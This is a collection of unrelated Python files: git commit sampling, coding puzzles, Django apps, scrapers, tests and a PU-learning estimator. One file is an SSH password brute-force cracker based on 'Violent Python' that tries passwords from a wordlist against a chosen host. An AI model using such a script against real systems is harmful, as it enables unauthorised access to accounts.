parser = argparse.ArgumentParser(
description='Populate a database with commits')
parser.add_argument('-d', '--repo-dir', required=True,
help='dir of the repo to select commits')
parser.add_argument('-b', '--branch', default='master',
help='branch of the repo to select commits')
parser.add_argument('-l', '--min-count', type=int, default=0,
help='min number of commit to begin with')
parser.add_argument('-u', '--max-count', type=int, default=sys.maxsize,
help='max number of commit to end with')
parser.add_argument('-e', '--emails', nargs='+',
help='emails of repo developers in the survey')
parser.add_argument('-f', '--file', help='email author list file')
parser.add_argument('-n', type=int, required=True,
help='number of self comparisons')
parser.add_argument('-m', type=int, default=0,
help="number of comparisons of others' commits")
parser.add_argument('-s', '--stats', action='store_true',
help='show stats of chosen commits, '
'without populating the database')
parser.add_argument('-v', '--verify', action='store_true',
help='print out commits for verification '
'without populating the database')
parser.add_argument('-r', '--ratio', type=int, default=sys.maxsize,
help='max ratio of commit sizes in a comparision')
args = parser.parse_args()
emails = args.emails if args.emails else []
emails += parse_emails(args.file) if args.file else []
if len(emails) < 1:
sys.exit('Please specify emails by -e or -f. See help info by -h.')
if args.m > 0 and len(emails) < 1 or args.n < 2:
sys.exit('ERR: Cannot meet the requirement of m.')
if args.m > args.n and args.n % (len(emails) - 1) == 0:
sys.exit('ERR: The current algorithm does not support such n and m. '
'Increase/decrease n by 1 or increase the number of emails.')
if args.m > args.n * (len(emails) - 1):
sys.exit('ERR: Cannot meet the requirement of m. Increase n.')
repo = git.Repo(args.repo_dir)
github_url = repo.remotes.origin.url
user_name, repo_name = parse_repo_url(github_url)
project_name = '%s-%s' % (user_name, repo_name)
project_id = "[Project ID]"
if not args.stats and not args.verify:
project_id = database.add_project(project_name, github_url)
email2commits = dict()
for commit in repo.iter_commits(args.branch, max_count=args.max_count,
skip=args.min_count):
if len(commit.parents) > 1:
continue
email = commit.author.email.lower()
if email not in email2commits:
email2commits[email] = [commit]
else:
email2commits[email].append(commit)
for e, author in enumerate(emails):
if not args.stats and not args.verify:
token = database.get_developer_token(author)
if token is None:
token = database.add_developer(author.split('@')[0], author)
print(author, compose_url(token, project_id))
n_added = 0
selected = []
while n_added < args.n:
selected = random.sample(email2commits[author],
min(args.n * 2, len(email2commits[author])))
selected = sorted(selected, key=lambda x: x.hexsha)
for i in range(-1, len(selected) - 1):
c1 = selected[i]
c2 = selected[i + 1]
c1_email = c1.author.email.lower()
c2_email = c2.author.email.lower()
assert c1_email == c2_email
n1 = c1.stats.total['lines']
n2 = c2.stats.total['lines']
if not n1 or not n2:
continue
if args.stats:
record_ratio(n1, n2)
elif int(max(n1 / n2, n2 / n1)) > args.ratio:
continue
elif args.verify:
print(c1.hexsha, c2.hexsha, n1, n2,
'%.2f' % max(n1 / n2, n2 / n1), sep='\t')
else:
database.add_commit(sha1_hex=c1.hexsha, title=c1.summary,
email=c1_email, project_id=project_id)
database.add_commit(sha1_hex=c2.hexsha, title=c2.summary,
email=c2_email, project_id=project_id)
database.add_comparison(c1.hexsha, c2.hexsha, author)
# Below is for the check purpose.
check_commit_pool.add(c1.hexsha)
check_commit_pool.add(c2.hexsha)
if author not in check_email2comparisons:
check_email2comparisons[author] = []
check_email2comparisons[author].append(
[c1_email, c1.hexsha, c2.hexsha])
n_added += 1
if n_added >= args.n:
break
m_added = 0
base = e
for i in range(-1, args.m - 1):
if emails[(base + i + 2) % len(emails)] == author:
base = base + 1
email = emails[(base + i + 2) % len(emails)]
assert email != author or len(emails) == 1
c1 = selected[i % len(selected)]
c2 = selected[(i + 1) % len(selected)]
assert c1.author.email.lower() == c2.author.email.lower()
n1 = c1.stats.total['lines']
n2 = c2.stats.total['lines']
if not n1 or not n2:
continue
if args.stats:
record_ratio(n1, n2)
elif int(max(n1 / n2, n2 / n1)) > args.ratio:
continue
elif not args.verify:
database.add_comparison(c1.hexsha, c2.hexsha, email)
# Below is for the check purpose.
if email not in check_email2comparisons:
check_email2comparisons[email] = []
check_email2comparisons[email].append(
[c1.author.email.lower(), c1.hexsha, c2.hexsha])
m_added += 1
if m_added >= args.m:
break
if args.stats:
s, d = sum_percents()
print('Total number of commits:', s)
for i, p in enumerate(d):
print('%dx=%.1f%%' % (i + 1, p * 100), end=', ')
print()
elif not args.verify:
check(args.n, args.m)
# Add builtin labels
reviewer = database.add_reviewer('jinglei@persper.org')
database.add_label('tiny', 'Builtin', reviewer)
database.add_label('small', 'Builtin', reviewer)
database.add_label('moderate', 'Builtin', reviewer)
database.add_label('large', 'Builtin', reviewer)
database.add_label('huge', 'Builtin', reviewer)
if __name__ == '__main__':
main()
|
#python3
'''
Given a binary array, find the maximum number of consecutive 1s in this array.
Example 1:
Input: [1,1,0,1,1,1]
Output: 3
Explanation: The first two digits or the last three digits are consecutive 1s.
The maximum number of consecutive 1s is 3.
Note:
The input array will only contain 0 and 1.
The length of input array is a positive integer and will not exceed 10,000
'''
def findMaxConsecutiveOnes(nums):
if nums.count(1) == 0:
return 0
elif nums.count(1) == len(nums):
return len(nums)
zeroIndexes = [i for i, num in enumerate(nums) if num == 0]
oneLengthes = []
oneLengthes.append(zeroIndexes[0])
for j in range(len(zeroIndexes)):
if j != len(zeroIndexes) - 1:
oneLengthes.append(zeroIndexes[j+1] - zeroIndexes[j] - 1)
oneLengthes.append(len(nums) - zeroIndexes[-1] - 1)
return max(oneLengthes)
if __name__ == '__main__':
print(findMaxConsecutiveOnes([1,1,0,1,1,1]))
print(findMaxConsecutiveOnes([1,0,1,1,0,1])) |
import textgenrnn as tgr
ufo_tgr2 = tgr.textgenrnn(name='ufo_model2')
ufo_tgr2.train_from_file('training_data2.txt', new_model=True, batch_size=512, num_epochs=5, rnn_bidirectional=True, rnn_size=64)
ufo_tgr.generate_samples(temperatures=[0.35, 0.45, .55, .65, .75], return_as_list=False)
textgen = textgenrnn('../weights/hacker_news.hdf5')
|
import subprocess
import time
import os
#-----------------------------------------------------------------------
def mapstate(winid):
"""
what is the mapped state of this window?
returns 'NoWindow','IsUnMapped','IsViewable'
"""
fd=subprocess.Popen('xwininfo -id "%s" 2>/dev/null'%(winid),shell=True,
stdout=subprocess.PIPE).stdout
for line in fd:
x=line.split()
if x[0:2] ==['Map','State:']:
return x[2]
return 'NoWindow'
#-----------------------------------------------------------------------
def waitfor(winid,delay=0.5):
"""wait for a window to become visible"""
while True:
state=mapstate(winid)
if state=='IsViewable':
break
time.sleep(delay)
#-----------------------------------------------------------------------
def windowid(name):
"""map a window name to a window id"""
fd=subprocess.Popen('xlsclients -l',shell=True,
stdout=subprocess.PIPE).stdout
for line in fd:
x=line.split()
if x[0]=='Window':
id=x[1][:-1]
if x[0]=='Name:' and x[1]==name:
return id
raise Exception('no window named: %s'%(name))
#-----------------------------------------------------------------------
def windowpos(winid):
"""get the position of a window"""
fd=subprocess.Popen('xwininfo -id %s'%(winid),shell=True,
stdout=subprocess.PIPE).stdout
for line in fd:
x=line.split()
if x[0:1]==['Width:']: ww=int(x[1])
if x[0:1]==['Height:']: hh=int(x[1])
if x[0:3]==['Absolute', 'upper-left', 'X:']: aulx=int(x[3])
if x[0:3]==['Absolute', 'upper-left', 'Y:']: auly=int(x[3])
if x[0:3]==['Relative', 'upper-left', 'X:']: rulx=int(x[3])
if x[0:3]==['Relative', 'upper-left', 'Y:']: ruly=int(x[3])
return (aulx-rulx,auly-ruly,ww,hh)
#-----------------------------------------------------------------------
def windowraise(winid):
"""raise the window"""
os.system('xdotool windowraise %s'%(winid))
#-----------------------------------------------------------------------
def moveto(winid, x, y):
"""move window to (x,y)"""
os.system('xdotool windowmove %s %d %d'%(winid,x,y))
#-----------------------------------------------------------------------
def slideto(winid,destx,desty,SLICES=25):
"""slide window to (x,y)"""
posa=windowpos(winid)
(startx,starty)=posa[0:2]
dx=(destx-startx)/float(SLICES)
dy=(desty-starty)/float(SLICES)
for i in range(SLICES):
cmd='xdotool windowmove %s %d %d'%(winid,startx+dx*i,starty+dy*i)
os.system(cmd)
os.system('xdotool windowmove %s %d %d'%(winid,destx,desty))
def position(winid1,pos,winid2,func):
"""move win1 relative to win2"""
macoffset=22
(x1,y1,w1,h1)=windowpos(winid1)
(x2,y2,w2,h2)=windowpos(winid2)
if pos == 'topof':
dx=x2
dy=y2-h1 - macoffset
elif pos == 'bottomof':
dx=x2
dy=y2+h2 + macoffset
elif pos == 'leftof':
dx=x2-w1
dy=y2
elif pos == 'rightof':
dx=x2+w2
dy=y2
func(winid1,dx,dy)
|
from plugins import BotPlugin
import re
class LetMeGoogleThatForYou(BotPlugin):
TRIGGER = "google"
def exec_plugin(self, command):
pattern = re.compile(r'google\s*(.+)$')
match = re.match(pattern, command)
if match:
query = match.group(1).replace(' ', '+')
return "Let me google that for you: https://google.com/#q={}".format(query)
|
# -*- coding: utf-8 -*-
# @Time : 2021/4/22 3:10 下午
# @Author : AI悦创
# @FileName: Spider.py
# @Software: PyCharm
# @Blog :http://www.aiyc.top
# @公众号 :AI悦创
import requests
import cchardet
import traceback
import re
from bs4 import BeautifulSoup
import csv
def downloader(url, timeout=10, headers=None, debug=False, binary=False):
_headers = {
'User-Agent': ('Mozilla/5.0 (compatible; MSIE 9.0; '
'Windows NT 6.1; Win64; x64; Trident/5.0)'),
}
redirected_url = url
if headers:
_headers = headers
try:
r = requests.get(url, headers=_headers, timeout=timeout)
if binary:
html = r.content
else:
encoding = cchardet.detect(r.content)['encoding']
html = r.content.decode(encoding)
status = r.status_code
redirected_url = r.url
except:
if debug:
traceback.print_exc()
msg = 'failed download: {}'.format(url)
print(msg)
if binary:
html = b''
else:
html = ''
status = 0
return status, html, redirected_url
# def write_csv(data):
# with open("stocks.csv", "a+")as f:
# f_csv = csv.writer(f)
# f_csv.writerow(data)
def write_dict_csv(data):
headers = ['ranking', 'region', 'permanent_resident_population', 'area', 'link']
with open("stocks.csv", "a+", encoding='gbk')as f:
f_csv = csv.DictWriter(f, headers)
f_csv.writeheader()
f_csv.writerows(data)
def parse(html):
soup = BeautifulSoup(html, "lxml")
# print(soup.title)
# print(soup.prettify())
# data_list = soup.select("#tablepress-48 .row-hover .even")
data_list = soup.select("#tablepress-48 .row-hover .even")
# print(data)
for index, data in enumerate(data_list):
# print(data)
"""
ranking:排名
region:地区
permanent_resident_population:常驻人口
area:面积
"""
ranking = data.select(".even .column-1")
region = data.select(".even .column-2")
permanent_resident_population = data.select(".even .column-3")
area = data.select(".even .column-4")
# link = data.select(".even .column-2 a").a.get('href')
# print("index:>>>", index)
if ranking and region and permanent_resident_population and area:
yield {
"ranking": ranking[0].string,
"region": region[0].string,
"permanent_resident_population": permanent_resident_population[0].string,
"area": area[0].string,
# "link": link
}
if __name__ == '__main__':
url = 'https://www.hongheiku.com/category/xianjirank'
s, html, lost_url = downloader(url)
# print(s, html, lost_url)
# print(list(parse(html)))
data = list(parse(html))
# for item in parse(html):
# print(item)
write_dict_csv(data)
|
from .wauchier import WauchierAllowedPOS, WauchierAllowedLemma, WauchierTokens, Wauchier
from .floovant import FloovantTokens, FloovantAllowedPOS, FloovantAllowedLemma, Floovant
import copy
import time
DB_CORPORA = {
"wauchier": {
"corpus": Wauchier,
"tokens": WauchierTokens,
"lemma": WauchierAllowedLemma,
"POS": WauchierAllowedPOS,
"morph": []
},
"floovant": {
"corpus": Floovant,
"tokens": FloovantTokens,
"lemma": FloovantAllowedLemma,
"POS": FloovantAllowedPOS,
"morph": []
}
}
def add_corpus(
corpus, db, with_token=True, tokens_up_to=None,
with_allowed_lemma=False, partial_allowed_lemma=False,
with_allowed_pos=False, partial_allowed_pos=False
):
""" Add the Wauchier Corpus to fixtures
:param corpus: Corpus to use
:param db: Database object
:param with_token: Add tokens as well
:param with_allowed_lemma: Add allowed lemma to db
:param partial_allowed_lemma: Restrict to first three allowed lemma (de saint martin)
:param with_allowed_pos: Add allowed POS to db
:param partial_allowed_pos: Restrict to first three allowed POS (ADJqua, NOMpro, CONcoo)
"""
db.session.add(copy.deepcopy(DB_CORPORA[corpus]["corpus"]))
db.session.commit()
add = []
if with_token is True:
if tokens_up_to is not None:
add += DB_CORPORA[corpus]["tokens"][:tokens_up_to]
else:
add += DB_CORPORA[corpus]["tokens"]
if with_allowed_lemma is True:
if partial_allowed_lemma:
add += DB_CORPORA[corpus]["lemma"][:3]
else:
add += DB_CORPORA[corpus]["lemma"]
if with_allowed_pos is True:
if partial_allowed_pos:
add += DB_CORPORA[corpus]["POS"][:3]
else:
add += DB_CORPORA[corpus]["POS"]
for x in add:
db.session.add(copy.deepcopy(x))
db.session.commit()
time.sleep(1)
|
# -*- coding: utf-8 -*-
"""
@Time : 2020/8/15 10:06
@Author : QDY
@FileName: 546. 移除盒子.py
@Software: PyCharm
"""
"""
给出一些不同颜色的盒子,盒子的颜色由数字表示,即不同的数字表示不同的颜色。
你将经过若干轮操作去去掉盒子,直到所有的盒子都去掉为止。
每一轮你可以移除具有相同颜色的连续 k 个盒子(k>= 1),这样一轮之后你将得到 k*k 个积分。
当你将所有盒子都去掉之后,求你能获得的最大积分和。
示例:
输入:boxes = [1,3,2,2,2,3,4,3,1]
输出:23
解释:
[1, 3, 2, 2, 2, 3, 4, 3, 1]
----> [1, 3, 3, 4, 3, 1] (3*3=9 分)
----> [1, 3, 3, 3, 1] (1*1=1 分)
----> [1, 1] (3*3=9 分)
----> [] (2*2=4 分)
提示:
1 <= boxes.length <= 100
1 <= boxes[i]<= 100
"""
from functools import lru_cache
class Solution:
def removeBoxes(self, boxes) -> int:
# # dp[l][r][k] = boxes[l:r+1]右边加上k个boxes[r]的最大积分
# N = len(boxes)
# dp = [[[0]*N for i in range(N)] for j in range(N)]
# def helper(l,r,k):
# nonlocal dp
# if l>r:return 0
# if dp[l][r][k] != 0: return dp[l][r][k]
# while r > 1 and boxes[r] == boxes[r-1]: # 若boxes[l:r+1]右边有连续的boxes[r]元素
# r -= 1 # 将r减小,将k增大,使得boxes[r]!=boxes[r-1]
# k += 1
# dp[l][r][k] = helper(l, r-1, 0) + (k+1)**2 # dp[l][r-1][0]+(k+1)*(k+1)
# for i in range(l,r): # 在l~r中找到与boxes[r]相同的元素boxes[i] 作为分割点
# if boxes[i] == boxes[r]:
# # dp[l][i][k+1]: boxes[l:i+1]右边再接k+1个boxes[i] 的最大得分
# # 这k+1个boxes[i] 为 boxes[l:r+1]后接的k个 加上 boxes[r]
# # dp[i+1][r-1]: boxes[i+1:r] 的最大得分
# dp[l][r][k] = max(dp[l][r][k],helper(l,i,k+1)+helper(i+1,r-1,0))
# return dp[l][r][k]
# return helper(0,N-1,0)
@lru_cache(None)
def helper(l, r, k):
if l > r: return 0
while r > 1 and boxes[r] == boxes[r - 1]:
r -= 1
k += 1
res = helper(l, r - 1, 0) + (k + 1) ** 2
for i in range(l, r):
if boxes[i] == boxes[r]:
res = max(res, helper(l, i, k + 1) + helper(i + 1, r - 1, 0))
return res
return helper(0, len(boxes) - 1, 0)
|
from rest_framework import status
from rest_framework.authtoken.models import Token
from rest_framework.reverse import reverse
from rest_framework.test import APIClient, APITransactionTestCase
from tests.factories.user import UserFactory
class CreateTokenForUserTest(APITransactionTestCase):
client = APIClient()
def setUp(self):
self.user = UserFactory(password="Asdf123!")
self.user.set_password(self.user.password)
self.user.save()
self.payload = {
"username": self.user.username,
"password": "Asdf123!",
}
self.invalid_payload = {
"username": self.user.username,
"password": self.user.password,
}
def test_create_token_successful(self):
response = self.client.post(reverse("auth-token"), data=self.payload)
assert response.status_code == status.HTTP_200_OK
assert "token" in response.json()
assert response.json()["token"] == Token.objects.first().key
def test_create_token_without_user(self):
response = self.client.post(reverse("auth-token"))
assert response.status_code == status.HTTP_400_BAD_REQUEST
assert response.json()["username"] == ["This field is required."]
assert response.json()["password"] == ["This field is required."]
def test_create_token_with_invalid_credentials(self):
response = self.client.post(reverse("auth-token"), data=self.invalid_payload)
assert response.status_code == status.HTTP_400_BAD_REQUEST
assert response.json()["non_field_errors"] == ["Unable to log in with provided credentials."]
|
#
#
# SSH brutforce cracker, based on project frome 'Violent Python'
# by TJ O'Connor
#
import pxssh
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value = maxConnections)
Found = False
Fails = 0
def conn(host, user, password, release):
global Found
global Fails
try:
s = pxssh.pxssh()
s.login(host, user, password)
print "Password found !!!: " + password
Found = True
except Exception, e:
if "read_nonblocking" in str(e):
Fails += 1
time.sleep(5)
conn(host, user, password, False)
elif 'synchronize with original prompt' in str(e):
time.sleep(5)
conn(host, user, password, False)
finally:
if release: connection_lock.release()
def main():
target_host = raw_input("Specify target host: ")
password_file = raw_input("Specify password_file: ")
user = raw_input("Specify user: ")
if target_host == None or password_file = None or user == None:
print "Please provide password file, target host and username"
exit(0)
fn = open(password_file, 'r')
for line in fn.readlines():
if Found:
print "Password Found !!! Exiting..."
exit(0)
if Fails > 5:
print "Too many socket timeouts. Exiting..."
exit(0)
connection_lock.acquire()
password = line.strip('\r').strip('\n')
print "[---] Testing: " + str(password)
t = Thread(target = conn, args = (host, user, password, True))
child = t.start()
|
import io
import os
import selenium
import time
import requests
import numpy as np
from google_images_download import google_images_download
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.chrome.options import Options
def main():
imagename = input("Enter image to overlay: ")
username = input("Enter username: ")
options = Options()
options.add_argument("--headless")
driver = webdriver.Chrome(options=options)
driver.get("https://images.google.com/")
inputBox = driver.find_element_by_name("q")
inputBox.send_keys(imagename)
inputBox.send_keys(Keys.RETURN)
WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.XPATH, '//*[@jsname="Q4LuWd"]')))
images = driver.find_elements_by_xpath('//*[contains(@class, "Q4LuWd")]')
print(len(images))
image_url = ''
for image in images:
image.click()
time.sleep(3)
# actual_image = driver.find_elements_by_xpath('//*[@class="n3VNCb"]')
actual_images = driver.find_elements_by_xpath('//*[@jsname="HiaYvf"]')
for actual_image in actual_images:
if 'http' in actual_image.get_attribute('src'):
print(actual_image.get_attribute('src'))
image_url = actual_image.get_attribute('src')
break
try:
persist_image(imagename, image_url)
break
except:
pass
img = Image.open("template.jpg")
jpg = 0
try:
overlay = Image.open(imagename + ".png")
except:
overlay = Image.open(imagename + ".jpg")
jpg = 1
w, h = overlay.size
bw, bh = img.size
if w < h:
overlay = overlay.crop((0, (h - w)/2, w, (w + h)/2))
elif w > h:
overlay = overlay.crop(((w - h)/2, 0, (w + h)/2, h))
overlay = overlay.resize((350, 350))
back_im = img.copy()
if jpg:
back_im.paste(overlay, (630, 770))
else:
back_im.paste(overlay, (630, 770), overlay)
draw = ImageDraw.Draw(back_im)
font = ImageFont.truetype("comicsans.ttf", 250)
W, H = font.getsize(imagename)
draw.text(((bw-W)/2,(bh-H)/2 + 560), imagename, (255, 0, 0), font=font)
draw.text(((bw-W)/2 + 100,(bh-H)/2 + 920), username, (0, 0, 0), font=font)
back_im.save('result.jpg', quality=90)
driver.close()
def persist_image(imagename, url:str):
try:
image_content = requests.get(url).content
except Exception as e:
print(f"ERROR - Could not download {url} - {e}")
try:
image_file = io.BytesIO(image_content)
image = Image.open(image_file).convert('RGB')
file_path = os.path.join(imagename + '.jpg')
with open(file_path, 'wb') as f:
image.save(f, "JPEG", quality=85)
print(f"SUCCESS - saved {url} - as {file_path}")
except Exception as e:
print(f"ERROR - Could not save {url} - {e}")
if __name__ == "__main__":
main()
|
import tweepy, credentials
import time
def status(account):
creds = credentials.credentials(1)
consumer_key = creds[0]
consumer_secret = creds[1]
access_token = creds[2]
access_token_secret = creds[3]
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
user = api.get_user(account)
userInfo = user._json
print('User: ', userInfo['name'])
print('')
print('Description: "', userInfo['description'], '"')
print('')
print('Number of tweets: ', userInfo['statuses_count'])
print('')
followers = int(userInfo['followers_count'])
friends = int(userInfo['friends_count'])
nonFollowers = friends - followers
if nonFollowers < 0:
nonFollowers = 'You have not non followers'
print('Followers: ', followers, "\nFollowing: ", friends, '\nFollow-Friends count: ', nonFollowers, '\n')
enter = input('\n\nPress enter to go back to menu.')
|
from datetime import date, datetime
from django import forms
from django.http import HttpResponseRedirect
from django.shortcuts import render
from persona.models import PersonaModel
class PersonaForm(forms.Form):
nombre = forms.CharField(label='Nombre', max_length=100)
apellido = forms.CharField(label='Apellido', max_length=100)
direccion = forms.CharField(label='Direccion', max_length=100, required=False)
def helloWorldView(request):
context = {
'saludo': 'Hola Mundo'
}
return render(request, 'hola-mundo.html', context=context)
def personaView(request):
if request.method == 'POST':
form = PersonaForm(request.POST)
if form.is_valid():
persona = dict()
data = request.POST
persona['nombre'] = data['nombre']
persona['apellido'] = data['apellido']
persona['direccion'] = data['direccion']
persona['edad'] = 26
persona['fecha_nacimiento'] = datetime(2020, 5, 1)
PersonaModel.objects.create(**persona)
return HttpResponseRedirect('/thanks')
else:
form = PersonaForm()
return render(request, 'persona-form.html', {'form': form})
def thanksView(request):
persona = PersonaModel.objects.get(pk=1)
persona.apellido = 'hernandez'
persona.save()
context = {
'nombre': persona.nombre
}
return render(request, 'thanks.html', context=context)
|
# One Distribution Inside (ODIn)
import pandas as pd
import numpy as np
import math
from KFold import KFold
from random import shuffle
def CreateHistogram(scores, thresholds):
scores.sort()
hist = [0] * 12
hist[0] = np.searchsorted(scores, thresholds[0], side="right")
for i in range(1, 11):
right = np.searchsorted(scores, thresholds[i], side="right")
left = np.searchsorted(scores, thresholds[i - 1], side="right")
hist[i] = right - left
hist[11] = len(scores) - np.searchsorted(scores, thresholds[10], side="right")
s = sum(hist)
return [x / s for x in hist]
def Overflow(A, B, s):
return sum((max(0, s * x[0] - x[1]) for x in zip(A, B)))
def BestFit(A, B, overflow_limit, eps):
left = 0
right = 1
while abs(right - left) > eps:
middle = (left + right) / 2
check = Overflow(A, B, middle)
if check <= middle * overflow_limit:
left = middle
else:
right = middle
return (left + right) / 2
def FindP(A, B, overflow_limit):
p = BestFit(A, B, overflow_limit, 1e-5)
return p - Overflow(A, B, p)
def EstimateOverflowLimit(scores, thresholds, iterations=100):
w = math.floor(len(scores) / 3)
s = 0
s2 = 0
for _ in range(iterations):
shuffle(scores)
dist_in = CreateHistogram(scores[:w], thresholds)
dist_out = CreateHistogram(scores[w:2 * w], thresholds)
v = Overflow(dist_in, dist_out, 1)
s += v
s2 += v * v
mu = s / iterations
sd = math.sqrt((s2 / iterations) - mu * mu)
return mu + 3 * sd
def ODIn(data, features, labeled_info, scorer, nfolds=10):
''' One Distribution Inside (ODIn)
Args:
data (list): list of observation points (dictionaries with [feature]:value).
features (list): list of which features should be considered.
labeled_info (str): name of the feature that indicates whether obseration point is labeled or not (1 or 0, respectively).
scorer (callable): One-class scorer to be used. See OCScorers.py for more information.
nfolds (int): number of folds for cross validation to generate training scores.
Returns:
(pred_c, pred_alpha): predicted c and predicted p (p is the proportion of positive observation points within the UNLABELED portion of the data).
'''
labeled = [x for x in data if x[labeled_info] == 1]
p_scores = []
for tr, te in KFold(nfolds, labeled):
tr_df = pd.DataFrame(tr)[features]
te_df = pd.DataFrame(te)[features]
p_scores += scorer(tr_df, te_df)
labeled_df = pd.DataFrame(labeled)[features]
unlabeled = [x for x in data if x[labeled_info] == 0]
unlabeled_df = pd.DataFrame(unlabeled)[features]
t_scores = scorer(labeled_df, unlabeled_df)
percentiles = np.arange(0, 101, 10)
thresholds = np.percentile(p_scores, percentiles)
overflow_limit = EstimateOverflowLimit(p_scores, thresholds)
p_histogram = CreateHistogram(p_scores, thresholds)
t_histogram = CreateHistogram(t_scores, thresholds)
p = FindP(p_histogram, t_histogram, overflow_limit)
c = max(0, min(1, len(labeled) / (p * len(unlabeled) + len(labeled))))
return c, p |
#!C:\Python27\python
# -*- coding: utf-8 -*-
'''
Created on 2016年6月20日
@author: tc
'''
import unittest,time,sys
from common_actions.commonActions import CommonActions
from common_actions.advantageRechargeActions import AdvantageActions
class advantageActions(unittest.TestCase):
def setUp(self):
self.commonActions=CommonActions()
self.adActions=AdvantageActions()
self.driver=self.commonActions.login()
def tearDown(self):
self.driver.quit()
def qtest_adRecharge001(self):
u"""优势话费充值"""
driver=self.driver
self.adActions.adRecharge(driver, 1, 0, 16, 5)
result=self.commonActions.verifyMbRecharge(driver)
print result
self.assertEqual(True, result, u'话费充值校验失败:'+sys._getframe().f_code.co_name)
driver.close()
def qtest_adRecharge002(self):
u"""优势话费充值"""
driver=self.driver
self.adActions.adRecharge(driver, 2, 0, 17, 5)
result=self.commonActions.verifyMbRecharge(driver)
print result
self.assertEqual(True, result, u'话费充值校验失败:'+sys._getframe().f_code.co_name)
driver.close()
def qtest_adRecharge003(self):
u"""优势话费充值"""
driver=self.driver
self.adActions.adRecharge(driver, 3, 0, 18, 5)
result=self.commonActions.verifyMbRecharge(driver)
print result
self.assertEqual(True, result, u'话费充值校验失败:'+sys._getframe().f_code.co_name)
driver.close()
def qtest_adRecharge004(self):
u"""优势话费充值"""
driver=self.driver
self.adActions.adRecharge(driver, 4, 0, 19, 5)
result=self.commonActions.verifyMbRecharge(driver)
print result
self.assertEqual(True, result, u'话费充值校验失败:'+sys._getframe().f_code.co_name)
driver.close()
def qtest_adRecharge005(self):
u"""优势话费充值"""
driver=self.driver
self.adActions.adRecharge(driver, 5, 0, 20, 5)
result=self.commonActions.verifyMbRecharge(driver)
print result
self.assertEqual(True, result, u'话费充值校验失败:'+sys._getframe().f_code.co_name)
driver.close()
def qtest_adRecharge006(self):
u"""优势话费充值"""
driver=self.driver
self.adActions.adRecharge(driver, 6, 0, 22, 5)
result=self.commonActions.verifyMbRecharge(driver)
print result
self.assertEqual(True, result, u'话费充值校验失败:'+sys._getframe().f_code.co_name)
driver.close()
def qtest_adRecharge007(self):
u"""优势话费充值"""
driver=self.driver
self.adActions.adRecharge(driver, 7, 0, 23, 5)
result=self.commonActions.verifyMbRecharge(driver)
print result
self.assertEqual(True, result, u'话费充值校验失败:'+sys._getframe().f_code.co_name)
driver.close()
def qtest_adRecharge008(self):
u"""优势话费充值-不是优势地区"""
driver=self.driver
info=self.adActions.disAdRecharge(driver, 8, 0)
result=self.adActions.verifyDisAdRecharge(info)
print result
self.assertEqual(True, result, u'话费充值校验失败:'+sys._getframe().f_code.co_name)
driver.close()
def qtest_adRecharge009(self):
u"""优势话费充值-不是优势地区"""
driver=self.driver
info=self.adActions.disAdRecharge(driver, 9, 0)
result=self.adActions.verifyAdRechargeErrorNum(info)
print result
self.assertEqual(True, result, u'话费充值校验失败:'+sys._getframe().f_code.co_name)
driver.close()
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main() |
import pyglet
from pyglet.gl import *
window = pyglet.window.Window()
@window.event
def on_draw():
# window.clear()
glClear(GL_COLOR_BUFFER_BIT)
glLoadIdentity()
glBegin(GL_TRIANGLES)
glVertex2f(0, 0) # 3个坐标点
glVertex2f(window.width, 0)
glVertex2f(window.width, window.height)
glEnd()
pyglet.app.run()
|
from django.db import models
from django.contrib.auth.models import AbstractUser
# Create your models here.
class User(AbstractUser):
pass
class Product(models.Model):
product_name = models.CharField(max_length=256)
description = models.CharField(max_length=64)
img_url = models.CharField(max_length=128)
price = models.DecimalField(max_digits=10, decimal_places=2)
weight = models.DecimalField(max_digits=10, decimal_places=2)
stock = models.IntegerField(null=False, blank=False, default=0)
def __str__(self):
return f"{self.product_name}: {self.description}"
class Cart(models.Model):
customer = models.ForeignKey(User, on_delete=models.CASCADE, related_name="customer_cart", null=True)
def __str__(self):
return f"{self.customer} Cart No. {self.id}"
class Cart_Item(models.Model):
cart = models.ForeignKey(Cart, on_delete=models.CASCADE, related_name="corresponding_cart")
product = models.ForeignKey(Product, on_delete=models.CASCADE, related_name="selected_item")
quantity = models.IntegerField(null=False, default=0)
def computed_price(self):
return f"{self.product.price * self.quantity}"
def computed_weight(self):
return f"{self.product.weight * self.quantity}"
def __str__(self):
return f"ID no. {self.id}: {self.product} x {self.quantity}"
class Shipping(models.Model):
min_weight = models.FloatField()
max_weight = models.FloatField()
price = models.FloatField()
def __str__(self):
return f"Shipping Type No. {self.id}: MinWeight = {self.min_weight}, MaxWeight = {self.max_weight}, Price = {self.price}"
class Shipping_Details(models.Model):
shipping_type = models.ForeignKey(Shipping, on_delete=models.CASCADE, related_name="shipping_reference")
shipment_owner = models.ForeignKey(User, on_delete=models.CASCADE, related_name="user_shipment")
full_name = models.CharField(max_length=35)
address1 = models.CharField(max_length=35)
address2 = models.CharField(max_length=35, blank=True)
address3 = models.CharField(max_length=35, blank=True)
city = models.CharField(max_length=35)
state = models.CharField(max_length=35)
country = models.CharField(max_length=35, default="Philippines")
def __str__(self):
return f"Shipping Detail No {self.id}:{self.full_name}"
class Job_Order(models.Model):
customer = models.ForeignKey(User, on_delete=models.CASCADE, related_name="order_owner")
shipping_details = models.ForeignKey(Shipping_Details, on_delete=models.CASCADE, related_name="shipping_details")
def __str__(self):
return f"Order No {self.id}: {self.customer}'s parcel"
class Job_Items(models.Model):
order_id = models.ForeignKey(Job_Order, on_delete=models.CASCADE, related_name="respective_order")
product = models.ForeignKey(Product, on_delete=models.CASCADE, related_name="job_product")
quantity = models.IntegerField()
def computed_price(self):
return f"{self.product.price * self.quantity}"
def computed_weight(self):
return f"{self.product.weight * self.quantity}"
def __str__(self):
return f"Job Order {self.order_id}: Item No. {self.id} x {self.quantity}" |
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler, Normalizer
from neupy import algorithms, estimators, environment, layers, architectures
from sklearn import metrics
from sklearn.model_selection import cross_validate
from sklearn.model_selection import cross_val_predict
df = pd.read_csv("OnlineNewsPopularity.csv")
